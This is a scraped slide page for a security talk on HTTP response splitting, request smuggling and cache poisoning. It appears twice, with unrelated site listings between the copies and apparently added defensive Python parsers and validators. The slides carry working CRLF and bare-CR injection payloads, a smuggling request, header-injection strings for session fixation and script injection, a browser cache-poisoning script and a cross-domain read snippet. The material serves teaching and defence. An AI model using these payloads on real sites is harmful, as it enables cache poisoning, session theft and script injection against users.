HTTP response Smuggling/Splitting & Cache poisoning
Come back!
HTTP Response Splitting

• Injecting part of an HTTP response into the response to an HTTP request.

https://www.owasp.org/index.php/CRLF_Injection

http://dl.packetstormsecurity.net/papers/general/whitepaper_httpresponse.pdf

http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2002-05/0077.html
HTTP Response Splitting
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>

This results in the following output stream, sent by the web server over the TCP connection:

HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html>

* Example from http://dl.packetstormsecurity.net/papers/general/whitepaper_httpresponse.pdf
PHP prevents splitting in versions >= 5.1.2 and >= 4.4.2
http://blog.php-security.org/archives/28-Goodbye-HTTP-Response-Splitting,-and-thanks-for-all-the-fish.html

Goodbye HTTP Response Splitting, and thanks for all the fish // Thursday, January 12, 2006, Stefan Esser

/* new line safety check */
char *s = header_line, *e = header_line + header_line_len, *p;

/* Walk every '\n' in the header line. A '\n' followed by a space or tab is
 * header folding and is allowed; any other '\n' means a second header was
 * injected, so the whole header is rejected. A bare '\r' is not inspected. */
while (s < e && (p = memchr(s, '\n', (e - s)))) {
    if (*(p + 1) == ' ' || *(p + 1) == '\t') {
        s = p + 1;
        continue;
    }
    efree(header_line);
    sapi_module.sapi_error(E_WARNING, "Header may not contain more than a single header, new line detected.");
    return FAILURE;
}
Why CRLF (%0d%0a) ???
http://www.w3.org/Protocols/rfc2616/rfc2616-sec6.html#sec6:

After receiving and interpreting a request message, a
server responds with an HTTP response message.
   Response        = Status-Line           ; Section 6.1
              *(( general-header      ; Section 4.5
               | response-header        ; Section 6.2
               | entity-header ) CRLF) ; Section 7.1
              CRLF
              [ message-body ]         ; Section 7.2
And what about real browsers?
#!/usr/bin/perl
use strict;
use warnings;
use Socket;
...
my $port = 8080;
my $proto = getprotobyname('tcp');
my $servaddr = sockaddr_in($port, INADDR_ANY);

socket SERVER, PF_INET, SOCK_STREAM, $proto or die "Unable to create socket: $!";
bind SERVER, $servaddr or die "Unable to bind: $!";
listen SERVER, 10;

# Status line ended by a bare CR, then a Set-cookie header preceded by every
# byte value 0..254: the cookies the browser ends up accepting show which
# bytes it treats as a header-line terminator.
my $answ = "HTTP/1.1 200 OK".chr(13)."Set-cookie: cook1=dsa";
for (my $i = 0; $i < 255; $i++) {
    $answ .= chr($i)."Set-cookie: cook-$i=OK";
}
# End of headers, then a body naming the browser under test.
$answ .= "\r\n\r\n<h1>Chrome 13</h1>";
print "Server running on port $port...\n";
while (accept CONNECTION, SERVER) {
...
And what about real browsers?
• It is possible to bypass the PHP header() check and inject headers
  (except in Firefox).
• It is possible to split the Response in Internet Explorer 8/9
Example #1. IE splitting (all PHP versions)
<?php
header("Location: ".$_GET['r']);
?>

?r=f%0dContent-Length:111%0d<html>%0d<script>alert(11)</script>

The payload uses only a bare CR (%0d): PHP's new-line check looks for \n, so the value passes, while IE treats the CR as a line terminator.
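The PHP 5.1.2 check above and the bare-CR bypass from the IE example, as an added Python example that is not part of the slides: the C rule is ported to Python beside a strict rule that also refuses CR, and both run over constructed header values. Function names and the sample values are my own.

```python
import re


def php_512_header_check(value):
    """Port of the PHP 5.1.2 rule from the slide: a "\\n" is tolerated only
    when the next character is a space or tab (header folding); any other
    "\\n" fails the header. A bare "\\r" is never inspected."""
    i = value.find("\n")
    while i != -1:
        if i + 1 >= len(value) or value[i + 1] not in " \t":
            return False
        i = value.find("\n", i + 1)
    return True


_LINE_TERMINATORS = re.compile(r"[\r\n\x00]")


def strict_header_check(value):
    """Hardened rule: refuse any CR, LF or NUL, folding included."""
    return _LINE_TERMINATORS.search(value) is None


def redirect_header(target):
    """What header("Location: ".$_GET['r']) should do: refuse a target that
    carries a line terminator instead of trying to clean it up."""
    if not strict_header_check(target):
        raise ValueError("line terminator in redirect target")
    return "Location: " + target


# Constructed sample values; "bare_cr" mirrors the %0d trick from the IE
# example with a harmless header in place of a script.
SAMPLES = {
    "plain": "foobar",
    "folded": "foo\n bar",
    "lf": "foobar\nSet-Cookie: a=b",
    "bare_cr": "foobar\rSet-Cookie: a=b",
}


def evaluate(samples=SAMPLES):
    """Map each sample name to (passes PHP 5.1.2 rule, passes strict rule)."""
    return {name: (php_512_header_check(v), strict_header_check(v))
            for name, v in samples.items()}


if __name__ == "__main__":
    for name, result in evaluate().items():
        print(f"{name:8s} php_5.1.2={result[0]!s:5s} strict={result[1]}")
```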
Smuggling classic
http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf

POST http://SITE/foobar.html HTTP/1.1
Host: SITE
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Content-Length: 44
[CRLF]
GET /poison.html HTTP/1.1
Host: SITE
Bla: [space after the "Bla:", but no CRLF]
GET http://SITE/page_to_poison.html HTTP/1.1
Host: SITE
Connection: Keep-Alive
[CRLF]
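An added Python example, not from the slides, serving both the redir_lang.jsp splitting stream and the classic smuggling request above: a minimal Content-Length framer that shows how the injected Content-Length: 0 yields two responses, how a first-wins and a last-wins parser disagree about where the second request begins, and how a strict parser (RFC 7230 section 3.3.3) refuses the ambiguous message. The two byte streams are constructed from the slides' text; function names and policy labels are my own.

```python
# Constructed from the redir_lang.jsp example quoted on the slides.
SPLIT_RESPONSE_STREAM = (
    b"HTTP/1.1 302 Moved Temporarily\r\n"
    b"Date: Wed, 24 Dec 2003 15:26:41 GMT\r\n"
    b"Location: http://10.1.1.1/by_lang.jsp?lang=foobar\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 19\r\n"
    b"\r\n"
    b"<html>Shazam</html>"
)

# Constructed from the "Smuggling classic" request on the slides. "Bla: " is
# deliberately not followed by CRLF, so a 44-byte body ends right after it.
SMUGGLED_REQUEST_STREAM = (
    b"POST http://SITE/foobar.html HTTP/1.1\r\n"
    b"Host: SITE\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 0\r\n"
    b"Content-Length: 44\r\n"
    b"\r\n"
    b"GET /poison.html HTTP/1.1\r\n"
    b"Host: SITE\r\n"
    b"Bla: "
    b"GET http://SITE/page_to_poison.html HTTP/1.1\r\n"
    b"Host: SITE\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
)


def body_length(headers, policy):
    """Body length from (name, value) header pairs. "first"/"last" mimic
    lenient parsers that silently pick one of several Content-Length headers;
    "strict" follows RFC 7230 section 3.3.3 and rejects disagreeing values."""
    values = [v for n, v in headers if n == "content-length"]
    if not values:
        return 0
    if policy == "strict" and len(set(values)) > 1:
        raise ValueError(f"conflicting Content-Length headers: {values}")
    chosen = values[0] if policy == "first" else values[-1]
    if not chosen.isdigit():
        raise ValueError(f"invalid Content-Length: {chosen!r}")
    return int(chosen)


def frame_messages(stream, policy="strict"):
    """Split a keep-alive byte stream into (start_line, headers, body) tuples.
    Only Content-Length framing is implemented; the slides' streams use nothing else."""
    messages = []
    pos = 0
    while pos < len(stream):
        end = stream.find(b"\r\n\r\n", pos)
        if end < 0:
            raise ValueError(f"incomplete header block at offset {pos}")
        lines = stream[pos:end].decode("latin-1").split("\r\n")
        headers = []
        for line in lines[1:]:
            name, sep, value = line.partition(":")
            if not sep:
                raise ValueError(f"malformed header line: {line!r}")
            headers.append((name.strip().lower(), value.strip()))
        length = body_length(headers, policy)
        body_start = end + 4
        body = stream[body_start:body_start + length]
        if len(body) != length:
            raise ValueError(f"truncated body: expected {length} bytes")
        messages.append((lines[0], headers, body))
        pos = body_start + length
    return messages


def start_lines(stream, policy):
    """Only the request/status lines a parser using `policy` would see."""
    return [m[0] for m in frame_messages(stream, policy)]


def strict_parser_accepts(stream):
    """True when the strict framer accepts the whole stream without error."""
    try:
        frame_messages(stream, "strict")
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(start_lines(SPLIT_RESPONSE_STREAM, "strict"))   # two responses
    print(start_lines(SMUGGLED_REQUEST_STREAM, "first"))  # second is /poison.html
    print(start_lines(SMUGGLED_REQUEST_STREAM, "last"))   # second is page_to_poison
    print(strict_parser_accepts(SMUGGLED_REQUEST_STREAM))  # False
```

With the first-wins policy the "Bla:" header swallows the second GET line as its value, which is why the 44-byte count matters: a last-wins parser ends the body exactly after "Bla: " and sees a different second request.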
Smuggling like header injections
 • Manipulating restrictions:
foobar%0dAccess-Control-Allow-Origin: *;
foobar%0dX-FRAME-OPTIONS: ALLOW-FROM attacker;
foobar%0dX-XSS-Protection: 0;
foobar%0dX-Content-Security-Policy: allow http://*:80;

 • Session fixation
foobar:%0dSet-Cookie:PHPSESSID=FAKED%0dLocation=/auth.php

 • Scripting/HTML injection
foobar:%0dRefresh: 1;url=data:text/html,<script>alert(1)</script>
Cache poisoning
• Web server cache
• Proxy server cache
• Browser cache
http://www.securityfocus.com/archive/1/434931

http://www.eecs.berkeley.edu/~yahel/papers/Browser-Cache-Poisoning.Song.Spring10.attack-project.pdf

http://www.eecs.berkeley.edu/~yahel/papers/Quantifying-Persistent-Browser-Cache-Poisoning.CS294-50.Song.Spring10.pdf
Cache poisoning classic
http://dl.packetstormsecurity.net/papers/general/whitepaper_httpresponse.pdf (2004)
Web server, proxy and browser specific techniques
For example, the IE 6 SP1 way:

// Warm-up request for the page whose cached copy is the target.
var r = new ActiveXObject("Microsoft.XMLHTTP");
r.open("GET", "http://10.1.1.1/index.html", false);
r.setRequestHeader("Pragma", "no-cache");
r.send();
// Request whose response is split; the injected second response carries
// a Last-Modified header so the browser will cache it.
r.open("GET", "http://10.1.1.1/SetLang.aspx?lang=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>Hacked!</html>", false);
r.send();
// The queued second response is matched to this request and cached as index.html.
r.open("GET", "http://10.1.1.1/index.html", false);
r.send();
Header injection & cache poisoning
• foobar%0dCache-Control: fake
• foobar%0dExpires: fake
• foobar%0dLast-Modified: fake



Which file is sweetest to poison?
• /index.php ?
• /auth.php ?
• /private-data.php ?
Which file is sweetest to poison?

CROSSDOMAIN.XML
http://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html
http://learn.adobe.com/wiki/download/attachments/64389123/CrossDomain_PolicyFile_Specification.pdf?version=1
Smuggling for non-HTTP PROTOCOLS?!
M.Zalewski: The Tangled Web.
http://www.nostarch.com/download/tangledweb_ch3.pdf

GET /<html><body><h1>Hi! HTTP/1.1
Host: example.com:25
...
220 example.com ESMTP
500 5.5.1 Invalid command: "GET /<html><body><h1>Hi! HTTP/1.1"
500 5.1.1 Invalid command: "Host: example.com:25"
...
421 4.4.1 Timeout
Smuggling for non-HTTP PROTOCOLS?!
Port restrictions (Chrome)

http://www.google.com/codesearch#wZuuyuB8jKQ/chromium/src/net/base/net_util.cc&exact_package=chromiumos&q=IsPortAllowedByDefault&type=cs&l=1564

1, 7, 9, 11, 13, 15, 17, 19-23, 25, 37, 42, 43, 53, 77, 79, 87, 95, 101-104, 109-111, 113, 115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512-515, 526, 530-532, 540, 556, 563, 587, 601, 636, 993, 995, 2049, 3659, 4045, 6000, 6665-6669
Smuggling for non-HTTP PROTOCOLS?!
Proxy server's response normalization
Echo server example #1 (direct connection):
> GET /<h1>O</h1> HTTP/1.1
< GET /<h1>O</h1> HTTP/1.1
...
The connection is never closed: the browser times out and shows no output.

Echo server example #2 (proxy connection):
> GET /<h1>O</h1> HTTP/1.1
< GET /<h1>O</h1> HTTP/1.1
...
The proxy times out and returns the echoed GET /<h1>O</h1> HTTP/1.1 as output.
Internet Explorer 8/9 bonus =)
Domains in a security zone with level "Low" and "Medium" get access to any cross-domain data...
<html>
<script>
function aa(url){
    var client = new XMLHttpRequest();
    client.open("GET", url, true);
    // readyState 2 is HEADERS_RECEIVED; the point of the slide is that in
    // these IE zones the cross-domain responseText is already exposed here.
    client.onreadystatechange = function() {
        if (this.readyState == 2)
            alert(client.responseText);
    };
    client.send();
}
aa("http://mail.yandex.ru");
</script>
</html>
???

d0znpp@onsec.ru

Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 

Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back

2. HTTP Response Splitting

• Injection of part of an HTTP response into the response to an HTTP request.

https://www.owasp.org/index.php/CRLF_Injection
http://dl.packetstormsecurity.net/papers/general/whitepaper_httpresponse.pdf
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2002-05/0077.html
3. HTTP Response Splitting

/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>

This results in the following output stream, sent by the web server over the TCP connection:

HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html>

* Example from http://dl.packetstormsecurity.net/papers/general/whitepaper_httpresponse.pdf
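What a strict HTTP/1.1 parser sees in the stream above: two complete responses where one request was sent. The following is an added example (Python, not code from the slides or from Klein's whitepaper); it frames responses by Content-Length only, because that is all the slide's stream uses, and the sample bytes are constructed from the slide's output stream. A proxy or client that parses this way and counts responses against requests on the connection can flag the unsolicited second response instead of matching it to whatever request is sent next.

```python
"""Strict parsing of an HTTP/1.1 response stream to detect a split response.

Added example. Only Content-Length framing is handled; a response without
Content-Length is taken to run to the end of the stream.
"""
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class Response:
    status_line: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""


def parse_responses(stream: bytes) -> list[Response]:
    """Split a byte stream into the HTTP/1.1 responses it contains."""
    responses: list[Response] = []
    pos = 0
    while pos < len(stream):
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end == -1:
            raise ValueError("truncated response head")
        head = stream[pos:head_end].decode("iso-8859-1")
        status_line, *header_lines = head.split("\r\n")
        if not status_line.startswith("HTTP/1."):
            raise ValueError(f"expected a status line, got {status_line!r}")
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        if "content-length" in headers:
            length = int(headers["content-length"])
            body = stream[body_start:body_start + length]
            if len(body) != length:
                raise ValueError("body shorter than Content-Length")
            pos = body_start + length
        else:
            body = stream[body_start:]
            pos = len(stream)
        responses.append(Response(status_line, headers, body))
    return responses


def detect_split(stream: bytes, requests_sent: int = 1) -> list[Response]:
    """Return every response beyond the number of requests actually sent."""
    return parse_responses(stream)[requests_sent:]


# Constructed from the output stream shown on the slide.
SPLIT_STREAM = (
    b"HTTP/1.1 302 Moved Temporarily\r\n"
    b"Date: Wed, 24 Dec 2003 15:26:41 GMT\r\n"
    b"Location: http://10.1.1.1/by_lang.jsp?lang=foobar\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 19\r\n"
    b"\r\n"
    b"<html>Shazam</html>"
)

if __name__ == "__main__":
    for extra in detect_split(SPLIT_STREAM):
        print("unsolicited response:", extra.status_line, extra.body)
```

Run stand-alone, the block reports the injected `HTTP/1.1 200 OK` response as unsolicited; the 302 with `Content-Length: 0` is the only response the single request was owed.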
4. PHP prevents splitting (>= 5.1.2, >= 4.4.2)

http://blog.php-security.org/archives/28-Goodbye-HTTP-Response-Splitting,-and-thanks-for-all-the-fish.html

Goodbye HTTP Response Splitting, and thanks for all the fish // Thursday, January 12, 2006, Stefan Esser

/* new line safety check */
char *s = header_line, *e = header_line + header_line_len, *p;
while (s < e && (p = memchr(s, '\n', (e - s)))) {
    if (*(p + 1) == ' ' || *(p + 1) == '\t') {
        /* LF followed by space or tab is header folding, not a new header */
        s = p + 1;
        continue;
    }
    efree(header_line);
    sapi_module.sapi_error(E_WARNING, "Header may not contain more than a single header, new line detected.");
    return FAILURE;
}
5. Why CRLF (%0d%0a) ???

http://www.w3.org/Protocols/rfc2616/rfc2616-sec6.html#sec6:

After receiving and interpreting a request message, a server responds with an HTTP response message.

   Response      = Status-Line               ; Section 6.1
                   *(( general-header        ; Section 4.5
                    | response-header        ; Section 6.2
                    | entity-header ) CRLF)  ; Section 7.1
                   CRLF
                   [ message-body ]          ; Section 7.2
6. And what about real browsers?

#!/usr/bin/perl
use Socket;
...
my $port = 8080;
my $proto = getprotobyname('tcp');
my $servaddr = sockaddr_in($port, INADDR_ANY);
socket SERVER, PF_INET, SOCK_STREAM, $proto or die "Unable to create socket: $!";
bind SERVER, $servaddr or die "Unable to bind: $!";
listen SERVER, 10;
# one Set-cookie header per candidate byte 0..254 used as the line separator;
# the cookies the browser actually stores show which bytes it accepts as a line break
my $answ = "HTTP/1.1 200 OK".chr(13)."Set-cookie: cook1=dsa";
for (my $i = 0; $i < 255; $i++) {
    $answ .= chr($i)."Set-cookie: cook-$i=OK";
}
$answ .= "\r\n\r\n<h1>Chrome 13</h1>";
print "Server running on port $port...\n";
while (accept CONNECTION, SERVER) {
...
7. And what about real browsers?

• It is possible to bypass the PHP header() function check and do injection (except in Firefox).
• It is possible to split the response in Internet Explorer 8/9.
8. Example #1. IE splitting (PHP all)

<?php header("Location: ".$_GET['r']); ?>

?r=f%0dContent-Length:111%0d<html>%0d<script>alert(11)</script>
9. Smuggling classic

http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf

POST http://SITE/foobar.html HTTP/1.1
Host: SITE
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Content-Length: 44
[CRLF]
GET /poison.html HTTP/1.1
Host: SITE
Bla: [space after the "Bla:", but no CRLF]
GET http://SITE/page_to_poison.html HTTP/1.1
Host: SITE
Connection: Keep-Alive
[CRLF]
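The classic request works only because the two hops disagree on which Content-Length to honour. The framing check below is an added example (Python, not from the slides or the Watchfire paper): it keeps every header occurrence and refuses to frame a body when the Content-Length values conflict, which is what RFC 7230 section 3.3.3 requires of a recipient. Going beyond the slide, it also rejects Content-Length combined with Transfer-Encoding, the other framing ambiguity the same section names. The sample requests are constructed; `SITE` is the paper's own placeholder host.

```python
"""Strict HTTP/1.1 request framing: reject ambiguous body lengths.

Added example. A request that two parsers could frame differently is
refused outright rather than being passed on with a guess.
"""


class FramingError(ValueError):
    """Raised when the message framing is ambiguous or malformed."""


def parse_head(raw: bytes):
    """Split the request into (request_line, [(name, value), ...], rest)."""
    head_end = raw.find(b"\r\n\r\n")
    if head_end == -1:
        raise FramingError("header block not terminated by CRLF CRLF")
    lines = raw[:head_end].decode("iso-8859-1").split("\r\n")
    request_line = lines[0]
    headers = []  # every occurrence is kept, in order; nothing is merged
    for line in lines[1:]:
        if line[:1] in (" ", "\t"):
            raise FramingError("obsolete line folding not accepted")
        name, sep, value = line.partition(":")
        if not sep or not name or name != name.strip():
            raise FramingError(f"malformed header line {line!r}")
        headers.append((name.lower(), value.strip()))
    return request_line, headers, raw[head_end + 4:]


def body_length(headers) -> int:
    """Return the single unambiguous Content-Length, or raise FramingError."""
    lengths = [v for n, v in headers if n == "content-length"]
    if lengths and any(n == "transfer-encoding" for n, _ in headers):
        raise FramingError("Content-Length together with Transfer-Encoding")
    if not lengths:
        return 0
    if len(set(lengths)) > 1:
        raise FramingError(f"conflicting Content-Length values {lengths}")
    if not lengths[0].isdigit():
        raise FramingError(f"invalid Content-Length {lengths[0]!r}")
    return int(lengths[0])


def check_request(raw: bytes):
    """Frame one request strictly; return (request_line, body, leftover)."""
    request_line, headers, rest = parse_head(raw)
    n = body_length(headers)
    if len(rest) < n:
        raise FramingError("body shorter than Content-Length")
    return request_line, rest[:n], rest[n:]


def classify(raw: bytes) -> str:
    try:
        check_request(raw)
        return "accepted"
    except FramingError as e:
        return f"rejected: {e}"


# Constructed from the slide's smuggling request.
SMUGGLED = (
    b"POST http://SITE/foobar.html HTTP/1.1\r\n"
    b"Host: SITE\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 0\r\n"
    b"Content-Length: 44\r\n"
    b"\r\n"
    b"GET /poison.html HTTP/1.1\r\n"
    b"Host: SITE\r\n"
    b"Bla: "
    b"GET http://SITE/page_to_poison.html HTTP/1.1\r\n"
    b"Host: SITE\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
)

# Constructed: the same ambiguity via Content-Length plus Transfer-Encoding.
TE_AND_CL = (
    b"POST /foobar.html HTTP/1.1\r\n"
    b"Host: SITE\r\n"
    b"Content-Length: 4\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n\r\n"
)

# Constructed: an ordinary, unambiguous request.
CLEAN = b"POST /foobar.html HTTP/1.1\r\nHost: SITE\r\nContent-Length: 5\r\n\r\na=b&c"

if __name__ == "__main__":
    for name, req in (("smuggled", SMUGGLED), ("te+cl", TE_AND_CL), ("clean", CLEAN)):
        print(name, "->", classify(req))
```

Rejecting the request at the first hop (with a 400 and a closed connection) is the point: once a front-end has forwarded a request it framed one way to a back-end that frames it the other way, the `GET /poison.html` line is either the next request or part of the body depending on who is reading.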
10. Smuggling like header injections

• Restriction manipulations:
  foobar%0dAccess-Control-Allow-Origin: *;
  foobar%0dX-FRAME-OPTIONS: ALLOW-FROM attacker;
  foobar%0dX-XSS-Protection: 0;
  foobar%0dX-Content-Security-Policy: allow http://*:80;
• Session fixation
  foobar:%0dSet-Cookie:PHPSESSID=FAKED%0dLocation=/auth.php
• Scripting/HTML injection
  foobar:%0dRefresh: 1;url=data:text/html,<script>alert(1)</script>
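Every payload on slides 8 and 10 relies on a lone `%0d` (CR) getting through a check that only looks for LF, which is exactly what the PHP 5.1.2 check on slide 4 does. The following added example (Python, not the slides' or PHP's code) puts that LF-only rule next to the check a header-setting API should actually apply: reject every control byte in the value, folding included, and validate the header name as an RFC 7230 token. The payloads are the ones shown on the slides, URL-decoded the way a framework hands `$_GET['r']` to application code; the legitimate value is constructed.

```python
"""Header-value validation: the LF-only check versus rejecting all control bytes.

Added example. `lf_only_check` mirrors the rule from the PHP 5.1.2 snippet;
`strict_check` is what an application or framework should enforce instead.
"""
import re
from urllib.parse import unquote

# RFC 7230 'token' characters, the only ones allowed in a header field name
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def lf_only_check(value: str) -> bool:
    """LF-only rule: a bare LF splits the header unless the next character
    is a space or tab (header folding). A lone CR is not examined at all."""
    i = value.find("\n")
    while i != -1:
        if value[i + 1:i + 2] not in (" ", "\t"):
            return False
        i = value.find("\n", i + 1)
    return True


def strict_check(value: str) -> bool:
    """Reject CR, LF, NUL and every other C0 control byte plus DEL.
    No legitimate header value needs any of them, folding included."""
    return not any(ord(c) < 0x20 or ord(c) == 0x7F for c in value)


def set_header(headers: dict, name: str, value: str) -> None:
    """Add a response header, raising instead of emitting a second header
    or a second response."""
    if not _TOKEN.match(name):
        raise ValueError(f"invalid header name {name!r}")
    if not strict_check(value):
        raise ValueError(f"control character in header value {value!r}")
    headers[name] = value


# Payloads from the slides, as the application sees them after URL decoding.
IE_SPLIT = unquote("f%0dContent-Length:111%0d<html>%0d<script>alert(11)</script>")
CRLF_SPLIT = unquote("foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK")
CORS_INJECT = unquote("foobar%0dAccess-Control-Allow-Origin: *;")
# Constructed legitimate redirect target.
LEGIT = "/by_lang.jsp?lang=en"


def compare(value: str) -> dict:
    """Show how each rule judges a value (True = would be emitted)."""
    return {"lf_only": lf_only_check(value), "strict": strict_check(value)}


if __name__ == "__main__":
    for label, v in (("IE_SPLIT", IE_SPLIT), ("CRLF_SPLIT", CRLF_SPLIT),
                     ("CORS_INJECT", CORS_INJECT), ("LEGIT", LEGIT)):
        print(label, compare(v))
```

The comparison makes the gap visible: the LF-only rule passes every CR-only payload and blocks only the textbook CRLF one, while the strict rule rejects all three and still accepts the ordinary redirect target. For a `Location` header specifically, the value should additionally be restricted to known destinations (an allow-list of paths or hosts), since a header that is free of control bytes can still be an open redirect.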
11. Cache poisoning

• Web server cache
• Proxy server cache
• Browser cache

http://www.securityfocus.com/archive/1/434931
http://www.eecs.berkeley.edu/~yahel/papers/Browser-Cache-Poisoning.Song.Spring10.attack-project.pdf
http://www.eecs.berkeley.edu/~yahel/papers/Quantifying-Persistent-Browser-Cache-Poisoning.CS294-50.Song.Spring10.pdf
12. Cache poisoning classic

http://dl.packetstormsecurity.net/papers/general/whitepaper_httpresponse.pdf (2004)

Web server, proxy and browser specific techniques. In the example, the IE 6 SP1 way:

var r = new ActiveXObject("Microsoft.XMLHTTP");
r.open("GET", "http://10.1.1.1/index.html", false);
r.setRequestHeader("Pragma", "no-cache");
r.send();
r.open("GET", "http://10.1.1.1/SetLang.aspx?lang=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>Hacked!</html>", false);
r.send();
r.open("GET", "http://10.1.1.1/index.html", false);
r.send();
13. Header injection & cache poisoning

• foobar%0dCache-Control: fake
• foobar%0dExpires: fake
• foobar%0dLast-Modified: fake

Which file is sweetest to poison?
• /index.php ?
• /auth.php ?
• /private-data.php ?
14. Which file is sweetest to poison? CROSSDOMAIN.XML

http://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html
http://learn.adobe.com/wiki/download/attachments/64389123/CrossDomain_PolicyFile_Specification.pdf?version=1
15. Smuggling for non-HTTP PROTOCOLS?!

M. Zalewski: The Tangled Web.
http://www.nostarch.com/download/tangledweb_ch3.pdf

GET /<html><body><h1>Hi! HTTP/1.1
Host: example.com:25
...
220 example.com ESMTP
500 5.5.1 Invalid command: "GET /<html><body><h1>Hi! HTTP/1.1"
500 5.1.1 Invalid command: "Host: example.com:25"
...
421 4.4.1 Timeout
16. Smuggling for non-HTTP PROTOCOLS?!

Port restrictions (Chrome)
http://www.google.com/codesearch#wZuuyuB8jKQ/chromium/src/net/base/net_util.cc&exact_package=chromiumos&q=IsPortAllowedByDefault&type=cs&l=1564

1,7,9,11,13,15,17,19-23,25,37,42,43,53,77,79,87,95,101-104,109-11,113,115,117,119,123,135,139,143,179,389,465,512-515,526,530-532,540,556,563,587,601,636,993,995,2049,3659,4045,6000,6665-6669
17. Smuggling for non-HTTP PROTOCOLS?!

Proxy server's response normalization

Echo server example #1 (direct connection):
> GET /<h1>O</h1> HTTP/1.1
< GET /<h1>O</h1> HTTP/1.1
...
connection never closed - timeout - no output

Echo server example #2 (proxy connection):
> GET /<h1>O</h1> HTTP/1.1
< GET /<h1>O</h1> HTTP/1.1
...
Proxy timeout, GET /<h1>O</h1> HTTP/1.1 output
18. Internet Explorer 8/9 bonus =)

